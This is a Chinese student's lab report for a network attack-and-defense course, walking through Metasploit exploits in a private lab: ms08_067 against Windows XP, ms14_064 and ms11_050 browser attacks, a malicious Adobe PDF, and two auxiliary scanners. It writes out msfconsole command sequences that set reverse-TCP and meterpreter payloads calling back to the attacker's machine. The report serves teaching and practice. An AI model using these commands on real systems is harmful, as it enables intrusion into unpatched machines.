2019-2020-2 20175233 《网络对抗技术》Exp6 MSF基础应用

2019-2020-2 20175233 《网络对抗技术》Exp6 MSF基础应用


  1. 实践内容(3.5分)

    本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    1. 一个主动攻击实践,如ms08_067; (1分)

    2. 一个针对浏览器的攻击,如ms11_050;(1分)

    3. 一个针对客户端的攻击,如Adobe;(1分)

    4. 成功应用任何一个辅助模块。(0.5分)

  2. 报告内容:

    1. 基础问题回答
  • 用自己的话解释什么是exploit,payload,encode

    • exploit是工具,用来连接漏洞,将payload传送到靶机中
    • payload是载荷,是目标系统在被exploit传送之后,去执行的攻击代码
    • encode是编码,用来包装payload,不让杀软轻易发现payload就是攻击代码
    1. 实践总结与体会
    • 实验主我要学习了metasploit工具多种方式的攻击,虽然攻击不复杂,但还是遇到好多错误,可能是msf对靶机的系统、版本等的要求不符,这我感受到要学的东西还有很多。
    1. 离实战还缺些什么技术或步骤?
    • 靶机的ip
    • 如何突破防火墙
  1. 实践过程记录

实践内容

一个主动攻击实践

ms08_067

  • Windows Xp的IP:192.168.0.104 kali的IP:192.168.0.124

  • 相互能ping通

  • 启动msfconsole,输入search ms08_067查找
    1.PNG

  • 输入指令 use exploit/windows/smb/ms08_067_netapi 进入攻击模块,使用 show payloads,查看能够使用的payloads
    2.PNG

  • 使用指令 set payload generic/shell_reverse_tcp 设置payload为反向tcp连接,使用 show options 查看可以设置的参数
    3.PNG

  • 设置参数

set RHOST 192.168.0.104 //设置靶机IP
set LPORT 5233 //设置攻击机端口
set LHOST 192.168.0.124//设置攻击机IP
exploit

4.PNG

  • 输入net user查看Win目前的用户名
    5.PNG

针对浏览器的攻击

ms14_064

  • 启动msfconsole,然后输入search ms14_064 查找
    6.PNG

  • 使用use windows/browser/ms14_064_ole_code_execution设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options 查看要设置的参数
    7.PNG

  • 设置参数

set LHOST 192.168.0.124
set LPORT 5233
set URIPATH 5233ysy  //设置url域名
exploit

8.PNG

  • 在Windows Xp浏览器输入http://192.168.0.124:8080/5233ysy
    9.PNG

  • 用指令sessions 查看会话信息
    10.PNG

ms11-050(失败)

输入

search ms11_050//查找漏洞
use exploit/windows/browser/ms11_050_mshtml_cobjectelement//选择漏洞
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.124//攻击机kali IP
set RHOST 192.168.0.104//靶机IP
exploit开始攻击

13.PNG

  • 在windows XP的浏览器中访问http://192.168.0.124:8080/uOCuTVxi
    14.PNG
    15.PNG

一个针对客户端的攻击

Adobe

  • 输入search adobe查找该漏洞使用的攻击模块,攻击模块为exploit/windows/fileformat/adobe_toolbutton
    16.PNG
use exploit/windows/fileformat/adobe_toolbutton//设置模块
set payload windows/meterpreter/reverse_tcp 设置payload,
show options //查看要设置的参数
set RHOST 192.168.0.104//设置靶机IP
set LPORT 5233  //设置攻击机端口
set LHOST 192.168.0.124 //设置攻击机IP
exploit

17.PNG
18.PNG

在linux中另外打开一个终端,msfconsole进入控制台
use exploit/multi/handler使用监听模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.124
set LPORT 5233
exploit

19.PNG

21.PNG

  • 靶机中打开pdf文件,攻击成功.

成功应用任何一个辅助模块

cert辅助模块

  • cert的扫描仪模块是一个有用的管理扫描仪,可以覆盖一个子网来检查服务器证书是否过期.

  • 输入search cert首先查看辅助模块cert辅助模块的信息
    22.PNG

  • 设置参数

use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.0.124/24
set THREADS 50
run

23.PNG
24.PNG

TCP"XMas"端口扫描(唯一)

  • 该模块的主要作用是判断端口是开放还是关闭,结果表示端口是开放或者被过滤(屏蔽)的.
  • search xmas首先查看xmas辅助模块的信息
  • 设置参数
use auxiliary/scanner/portscan/xmas
set RHOST 192.168.0.124
set ports 5233
run

25.PNG

posted @ 2020-05-02 21:07  20175233  阅读(124)  评论(0)    收藏  举报